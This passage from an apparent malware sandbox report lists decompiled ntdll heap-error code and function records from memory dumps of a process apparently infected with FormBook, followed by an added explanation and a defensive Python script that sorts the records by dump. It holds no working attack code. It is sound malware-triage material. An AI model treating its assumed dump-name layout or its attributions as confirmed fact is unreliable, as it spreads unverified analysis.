                                                    				E0153B150("Heap error detected at %p (heap handle %p)\n",  *0x16258a0);
                                                    				_t27 =  *0x1625898; // 0x0
                                                    				if(_t27 <= 0xf) {
                                                    					switch( *((intOrPtr*)(_t27 * 4 +  &M015F1E96))) {
                                                    						case 0:
                                                    							_t105 = "heap_failure_internal";
                                                    							goto L21;
                                                    						case 1:
                                                    							goto L21;
                                                    						case 2:
                                                    							goto L21;
                                                    						case 3:
                                                    							goto L21;
                                                    						case 4:
                                                    							goto L21;
                                                    						case 5:
                                                    							goto L21;
                                                    						case 6:
                                                    							goto L21;
                                                    						case 7:
                                                    							goto L21;
                                                    						case 8:
                                                    							goto L21;
                                                    						case 9:
                                                    							goto L21;
                                                    						case 0xa:
                                                    							goto L21;
                                                    						case 0xb:
                                                    							goto L21;
                                                    						case 0xc:
                                                    							goto L21;
                                                    						case 0xd:
                                                    							goto L21;
                                                    						case 0xe:
                                                    							goto L21;
                                                    						case 0xf:
                                                    							goto L21;
                                                    					}
                                                    				}
                                                    				L21:
                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    					_push(_t104);
                                                    					E0153B150();
                                                    				} else {
                                                    					E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    				}
                                                    				_push(_t105);
                                                    				E0153B150("Error code: %d - %s\n",  *0x1625898);
                                                    				_t113 =  *0x16258a4; // 0x0
                                                    				if(_t113 != 0) {
                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    						_push(_t104);
                                                    						E0153B150();
                                                    					} else {
                                                    						E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    					}
                                                    					E0153B150("Parameter1: %p\n",  *0x16258a4);
                                                    				}
                                                    				_t115 =  *0x16258a8; // 0x0
                                                    				if(_t115 != 0) {
                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    						_push(_t104);
                                                    						E0153B150();
                                                    					} else {
                                                    						E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    					}
                                                    					E0153B150("Parameter2: %p\n",  *0x16258a8);
                                                    				}
                                                    				_t117 =  *0x16258ac; // 0x0
                                                    				if(_t117 != 0) {
                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    						_push(_t104);
                                                    						E0153B150();
                                                    					} else {
                                                    						E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    					}
                                                    					E0153B150("Parameter3: %p\n",  *0x16258ac);
                                                    				}
                                                    				_t119 =  *0x16258b0; // 0x0
                                                    				if(_t119 != 0) {
                                                    					L41:
                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    						_push(_t104);
                                                    						E0153B150();
                                                    					} else {
                                                    						E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    					}
                                                    					_push( *0x16258b4);
                                                    					E0153B150("Last known valid blocks: before - %p, after - %p\n",  *0x16258b0);
                                                    				} else {
                                                    					_t120 =  *0x16258b4; // 0x0
                                                    					if(_t120 != 0) {
                                                    						goto L41;
                                                    					}
                                                    				}
                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                    					_push(_t104);
                                                    					E0153B150();
                                                    				} else {
                                                    					E0153B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                    				}
                                                    				return E0153B150("Stack trace available at %p\n", 0x16258c0);
                                                    			}












                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                    • API String ID: 0-2897834094
                                                    • Opcode ID: 4259819ef9f24a7b43cf92b276d1c3ef210eddbb66dbe677c900188d063a919a
                                                    • Instruction ID: 037a6924ee069498a2e24706c84c6438a6ec88f7daba1801417ba9c21a4b9deb
                                                    • Opcode Fuzzy Hash: 4259819ef9f24a7b43cf92b276d1c3ef210eddbb66dbe677c900188d063a919a
                                                    • Instruction Fuzzy Hash: A361E533510966DFD331AB89D8C6E3877E4FB45930F09846EF70A9F384D6B898418B0A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $: $: $Host$Host: $Unknown
                                                    • API String ID: 0-3527920956
                                                    • Opcode ID: b3fae090131a80bd029623294f3545b807d829eaad322e1187c901e42d42e0d2
                                                    • Instruction ID: c73720650d0308e043dd651217ad3673d7f5387b2a3ffe2320e9d7bfff04ae81
                                                    • Opcode Fuzzy Hash: b3fae090131a80bd029623294f3545b807d829eaad322e1187c901e42d42e0d2
                                                    • Instruction Fuzzy Hash: FA31D476904208ABCB10CF98CC81FEEB7B8EF89304F04866AF9199B245D775A545C7F5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • WindowsExcludedProcs, xrefs: 01543D6F
                                                    • Kernel-MUI-Number-Allowed, xrefs: 01543D8C
                                                    • Kernel-MUI-Language-SKU, xrefs: 01543F70
                                                    • Kernel-MUI-Language-Disallowed, xrefs: 01543E97
                                                    • Kernel-MUI-Language-Allowed, xrefs: 01543DC0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                    • API String ID: 0-258546922
                                                    • Opcode ID: 11d42b8f52f8a651290f7f96c3910249a66c008bda8d75a71f71a4691abc7880
                                                    • Instruction ID: 8c29a44160e9bc20b98148e0186804af05360e5edb5e56a0e9a6d8ca3850ea8f
                                                    • Opcode Fuzzy Hash: 11d42b8f52f8a651290f7f96c3910249a66c008bda8d75a71f71a4691abc7880
                                                    • Instruction Fuzzy Hash: 92F13E72D4061AEFDF11DF98D980AEEBBB9FF58650F14046AE905AF250D7349E01CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • LdrpFindDllActivationContext, xrefs: 015A9331, 015A935D
                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 015A932A
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 015A933B, 015A9367
                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 015A9357
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 0-3779518884
                                                    • Opcode ID: 98319f05c915c5cc18ff02e754fe57309c8de6a1280a2c0685c151cfd9671660
                                                    • Instruction ID: cd467099efc7ffe7c6c344531e680f55078dac813fd5827bce5aac52b95d7193
                                                    • Opcode Fuzzy Hash: 98319f05c915c5cc18ff02e754fe57309c8de6a1280a2c0685c151cfd9671660
                                                    • Instruction Fuzzy Hash: EF41F832A407169FEB36AB1C8C89B7DB7BDBB41254F46466AE9045F151E7B05DC0C3C1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01599C18
                                                    • LdrpDoPostSnapWork, xrefs: 01599C1E
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01599C28
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 2994545307-1948996284
                                                    • Opcode ID: 00de456585454c2ef9e85a967db1f932cc5f8f96296d05839e19c696865a1cb1
                                                    • Instruction ID: ab4f4be81f96abfeb8043c6c6a3675daad231eba8bbaeeea834e919dbe7f2314
                                                    • Opcode Fuzzy Hash: 00de456585454c2ef9e85a967db1f932cc5f8f96296d05839e19c696865a1cb1
                                                    • Instruction Fuzzy Hash: 52910371A00616DBEF29DF99D881ABE77B5FF84318B08456DEA05AF241E730E901CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 01599891
                                                    • LdrpCompleteMapModule, xrefs: 01599898
                                                    • minkernel\ntdll\ldrmap.c, xrefs: 015998A2
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                    • API String ID: 0-1676968949
                                                    • Opcode ID: 8830e21de91cf3da86c2d71523ba6c0a8e13c734d1d49f48747f309d46bdc362
                                                    • Instruction ID: 63bbd90b7e04b349933847c9dcc85a616fb4ea1afb34fea6d95dcf1e063fdeaf
                                                    • Opcode Fuzzy Hash: 8830e21de91cf3da86c2d71523ba6c0a8e13c734d1d49f48747f309d46bdc362
                                                    • Instruction Fuzzy Hash: 2851DE316007469FEB32CB6CC944B6ABBE4FB49318F140A99E9519F7D1D734E901CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • @, xrefs: 0153E6C0
                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0153E68C
                                                    • InstallLanguageFallback, xrefs: 0153E6DB
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                    • API String ID: 0-1757540487
                                                    • Opcode ID: 8bd80e4172f4668df5357edf72087dc5207dfca61cdb67eab7d6f47485664c22
                                                    • Instruction ID: c70ac8aa85d71f02619f375e828972aeb29b98515d2d7998428c893e92b4f8d4
                                                    • Opcode Fuzzy Hash: 8bd80e4172f4668df5357edf72087dc5207dfca61cdb67eab7d6f47485664c22
                                                    • Instruction Fuzzy Hash: D851A1725143469BDB12DF68C840A6FB7E8FF88654F45092EF989DB240F734D914C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                    • Instruction ID: 9191ce6e2c0b8e438e8caca772a0d71e4c31a13655e164c390cd4195bd54209e
                                                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                    • Instruction Fuzzy Hash: A2915D312043429BE725CE29C846B1BBBE5FFC4714F15892DF699CB290E774E904CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: 49b92ad6a18f257e406e4cafbf7fac37d5ba5c8db4a096b763357c434ccb26a2
                                                    • Instruction ID: 74b15e9aa87ab52bbd819d6c741940889bed8aeacd71ff0d5ab1256582170f98
                                                    • Opcode Fuzzy Hash: 49b92ad6a18f257e406e4cafbf7fac37d5ba5c8db4a096b763357c434ccb26a2
                                                    • Instruction Fuzzy Hash: 72517C71A116099FDB29DFA8C880AADBBF8FF48700F14442DE649EF251E6719941CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0155B9A5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 885266447-0
                                                    • Opcode ID: adfca3d2503e34e5a17fe3ac259ad7fc191f1ad631c5f26bf3a1c0078e7f006a
                                                    • Instruction ID: 00659d367e2da16bc1b1cc2512b4b2a78e7df83456b3780fbb0e93168a2d61a3
                                                    • Opcode Fuzzy Hash: adfca3d2503e34e5a17fe3ac259ad7fc191f1ad631c5f26bf3a1c0078e7f006a
                                                    • Instruction Fuzzy Hash: DF515971A08741CFC761CF28C4A492EBBFAFB88610F54896EF9858B355D771E844CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID: _vswprintf_s
                                                    • String ID:
                                                    • API String ID: 677850445-0
                                                    • Opcode ID: 9a4462503fcd34773ecf6afdc7e8e19cce4df61e73af48066cfb16213e87f32d
                                                    • Instruction ID: 63e9341197ba3982278874bdbcdda4d24dec78f8b1afee4a5a3ff5f7cd3265d2
                                                    • Opcode Fuzzy Hash: 9a4462503fcd34773ecf6afdc7e8e19cce4df61e73af48066cfb16213e87f32d
                                                    • Instruction Fuzzy Hash: 3751CE71D0025A8AEF35CF688A45BBEBBF0BF40714F1041ADD859AF282D7744D42CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PATH
                                                    • API String ID: 0-1036084923
                                                    • Opcode ID: 910211ef9dfabc70437e4f8bb39ddbb7092fbbda65e2cf07af065b698d6de92f
                                                    • Instruction ID: 8b45599b8a070ddefc37dd999c2683d19a77c99a651eb6fa280a94825caf9600
                                                    • Opcode Fuzzy Hash: 910211ef9dfabc70437e4f8bb39ddbb7092fbbda65e2cf07af065b698d6de92f
                                                    • Instruction Fuzzy Hash: E8C19F71E1061ADFDB25DF98DC81AADBBF9FF48740F444429E901AF250E738A941CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 015ABE0F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                    • API String ID: 0-865735534
                                                    • Opcode ID: 6e72934094f23b9a9bf1fcce47464e8f7e9d36bd7209dc036a0e1475904997f8
                                                    • Instruction ID: e0d076c5ab4a015046db3b7d27432b03df297b2d78c12912638a9061a75778b6
                                                    • Opcode Fuzzy Hash: 6e72934094f23b9a9bf1fcce47464e8f7e9d36bd7209dc036a0e1475904997f8
                                                    • Instruction Fuzzy Hash: D4A1F171E046068FEB25DF6CD860B6EBBA9BF48714F04456AEA16CF694DB30D841CBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Re-Waiting
                                                    • API String ID: 0-316354757
                                                    • Opcode ID: 87d7a1446d1b32c6a94e602650c013bb71fd864a5312bee7ed9b1fe61da7731c
                                                    • Instruction ID: 1fb0668234d1c0449cfe42bec6e49659dabd943461da4286441680ac5482d10a
                                                    • Opcode Fuzzy Hash: 87d7a1446d1b32c6a94e602650c013bb71fd864a5312bee7ed9b1fe61da7731c
                                                    • Instruction Fuzzy Hash: B1613931A00A069FDB32EF6CC845B7EBBE5FB88724F14065AD911AF2C1C7749941C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: 1e6ddac8e606ebf9d31fd0da9a4f9a950074e5464fbda53211a5daa973bfc35f
                                                    • Instruction ID: 5fdbb5a1389c0ab9681299dab401fdb0c3353f333302a396fe9e0ad7cbf33c47
                                                    • Opcode Fuzzy Hash: 1e6ddac8e606ebf9d31fd0da9a4f9a950074e5464fbda53211a5daa973bfc35f
                                                    • Instruction Fuzzy Hash: 4C518C712043829BD32ADF28DC80B1BBBE5EBC5754F04092DFA968B290DB70E805C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction ID: 5f7f6391773598196933041746750053ef010944ddbc64eb9690890a081e1b1c
                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction Fuzzy Hash: 04517D71504712AFC320DF19C851A6BBBF8FF88750F00892EF9958B650E7B4E944CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    • Opcode ID: c236ac73feebdf96aa5bd8dc0de9e6eaeea504af4f5eb41b691c484c220eeb15
                                                    • Instruction ID: f27c19e221ae374cc08b22b4f5319a5bdd31bbcfb1eb081cc9cd367b7f90971a
                                                    • Opcode Fuzzy Hash: c236ac73feebdf96aa5bd8dc0de9e6eaeea504af4f5eb41b691c484c220eeb15
                                                    • Instruction Fuzzy Hash: 664131B190052EABDB61DE50DC81FEEB77CBB44714F0045A5EA09BF240DB309E888FA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction ID: 6955146f27cff74f58a55c843b7be46b377c4529c7ea01e7ef7eb1ab85f02af2
                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction Fuzzy Hash: BB3104326003566BE715DE28CC85F977BDAFBC4794F144229FA599B2C0D770E904C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    • Opcode ID: fcd7eb7f9ba58883c720bb7055dc541185285182caa1da8801916dc35efb506c
                                                    • Instruction ID: cb148aa8ba3867fe7d6e4684c0d85180c9e86d187d96efa90754e1c956c40837
                                                    • Opcode Fuzzy Hash: fcd7eb7f9ba58883c720bb7055dc541185285182caa1da8801916dc35efb506c
                                                    • Instruction Fuzzy Hash: B731E33290161ABFEB55DE59C985EAFBBB4FB80B20F024169E915BF250D730DE00C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 69f02f0c7ce56ddb1dfe723c7cdebf91b64eff7343a36f2f3c6cf2a8fa10b028
                                                    • Instruction ID: 31b0535021edaf9ac43e08b49a753735645211a71690f53b52f64cff87b38301
                                                    • Opcode Fuzzy Hash: 69f02f0c7ce56ddb1dfe723c7cdebf91b64eff7343a36f2f3c6cf2a8fa10b028
                                                    • Instruction Fuzzy Hash: D63147B16083069FC361DF68D98096FBBF8BBD9654F400A2EB9958B250D634DD05CBE2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: WindowsExcludedProcs
                                                    • API String ID: 0-3583428290
                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction ID: 703cf87fd06aa8c9d6ad8bd4806b895f647a0a386e3cb6efffa509fe4e1f2524
                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction Fuzzy Hash: 9F210A36900519ABDF229A59CD80F5F7BADFF84654F054426FE048F200D630EC50CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Actx
                                                    • API String ID: 0-89312691
                                                    • Opcode ID: 9091f84ee21c0524aefb313d94072f074df8429052a6a493e72013548277bf75
                                                    • Instruction ID: b85d32815ba3fd71a9e20558865669fae3be31be7aa739086a7f66e1c15c7077
                                                    • Opcode Fuzzy Hash: 9091f84ee21c0524aefb313d94072f074df8429052a6a493e72013548277bf75
                                                    • Instruction Fuzzy Hash: DB11B2353646028BFBA54E1D84B073E76D6FB86624F24492BED62CF791EB70D8418380
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

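The function records above come from two memory dumps of the same process: the dump based at 0x00400000 carries a Yara match and HTTP-style strings ("Host: "), which fits the FormBook detection at the top of the report, while every record from the dump based at 0x01510000 carries ntdll's own strings (loader diagnostics from minkernel\ntdll\ldrsnap.c, heap_failure_* codes, Kernel-MUI settings). In practice that second dump is a mapped copy of ntdll inside the injected process, not payload code, and an analyst wading through hundreds of these records wants them sorted by dump before reading any of them. The helper below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in the listing format shown on this page, groups them by source dump, and marks a dump as payload when it has a Yara match and as a system library when its strings are ntdll's. The record sample inside it is constructed from three records on this page. Two things are assumptions rather than documented facts: the field layout of the .sdmp file name (process index, round, sequence, base address, page protection, type) and that the fifth field is a Windows PAGE_* protection value, so that 00000040 decodes to PAGE_EXECUTE_READWRITE; the marker list used to recognise ntdll strings is a heuristic chosen for this report.

```python
# Triage helper for "Memory Dump Source" function records in a Joe Sandbox report.
# Added example; assumptions about the dump-name layout are marked below.
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List

# Windows PAGE_* memory protection constants (winnt.h), used to decode the dump name.
PAGE_PROTECTIONS = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Heuristic: substrings that mark strings from ntdll's own loader/heap/NLS code, not a payload.
SYSTEM_MARKERS = ("minkernel\\ntdll", "Ldrp", "heap_failure", "Kernel-MUI", "RTL: ")

_SOURCE_RE = re.compile(r"Source File:\s*(\S+),")


@dataclass
class FunctionRecord:
    source_file: str = ""
    yara_match: bool = False
    api_ids: List[str] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    fuzzy_hash: str = ""


def _split_dollar(value: str) -> List[str]:
    """The report joins several IDs with '$'; empty pieces carry no information."""
    return [piece for piece in value.split("$") if piece]


def parse_records(text: str) -> List[FunctionRecord]:
    """A record ends at its 'Uniqueness Score' line; every field seen before it belongs to it."""
    records, current = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()  # drop the bullet the report puts before fields
        match = _SOURCE_RE.search(line)
        if match:
            current.source_file = match.group(1)
        elif line == "Yara matches":
            current.yara_match = True
        elif line.startswith("API ID:"):
            current.api_ids = _split_dollar(line[len("API ID:"):].strip())
        elif line.startswith("String ID:"):
            current.strings = _split_dollar(line[len("String ID:"):].strip())
        elif line.startswith("Instruction Fuzzy Hash:"):
            current.fuzzy_hash = line.split(":", 1)[1].strip()
        elif line.startswith("Uniqueness Score:"):
            if current.source_file:
                records.append(current)
            current = FunctionRecord()
    return records


def decode_dump_name(name: str) -> Dict[str, object]:
    """ASSUMED layout (not stated on the page), all fields hex:
    <process index>.<round>.<sequence>.<base address>.<page protection>.<type>.sdmp"""
    parts = name.split(".")
    if len(parts) != 7 or parts[-1] != "sdmp":
        raise ValueError(f"unexpected dump name: {name}")
    protect = int(parts[4], 16)
    return {"process_index": int(parts[0], 16), "base": int(parts[3], 16),
            "protection": PAGE_PROTECTIONS.get(protect, f"0x{protect:x}")}


def classify_dumps(records: List[FunctionRecord]) -> Dict[str, Dict[str, object]]:
    """Group records per dump: a Yara hit marks a payload, ntdll-only strings a system library."""
    by_dump: Dict[str, List[FunctionRecord]] = defaultdict(list)
    for rec in records:
        by_dump[rec.source_file].append(rec)
    summary = {}
    for name, recs in by_dump.items():
        system_hits = sum(1 for r in recs
                          if any(marker in s for s in r.strings for marker in SYSTEM_MARKERS))
        yara = any(r.yara_match for r in recs)
        verdict = ("payload (Yara match)" if yara
                   else "system library (ntdll strings)" if system_hits else "unknown")
        summary[name] = {**decode_dump_name(name), "records": len(recs),
                         "system_string_hits": system_hits, "verdict": verdict}
    return summary


# Constructed sample: three records copied from this page, trimmed to the fields parsed above.
SAMPLE_LISTING = r"""
• Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
• API ID:
• String ID: Error code: %d - %s$HEAP: $heap_failure_buffer_overrun$heap_failure_usage_after_free
• Instruction Fuzzy Hash: A361E533510966DFD331AB89D8C6E3877E4FB45930F09846EF70A9F384D6B898418B0A
Uniqueness Score: -1.00%
• Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
• API ID:
• String ID: $: $: $Host$Host: $Unknown
• Instruction Fuzzy Hash: FA31D476904208ABCB10CF98CC81FEEB7B8EF89304F04866AF9199B245D775A545C7F5
Uniqueness Score: -1.00%
• Source File: 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true
• API ID: InitializeThunk
• String ID: LdrpDoPostSnapWork$minkernel\ntdll\ldrsnap.c
• Instruction Fuzzy Hash: 52910371A00616DBEF29DF99D881ABE77B5FF84318B08456DEA05AF241E730E901CB91
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for dump, info in classify_dumps(parse_records(SAMPLE_LISTING)).items():
        print(f"{dump}: base=0x{info['base']:x} {info['protection']} -> {info['verdict']}")
```

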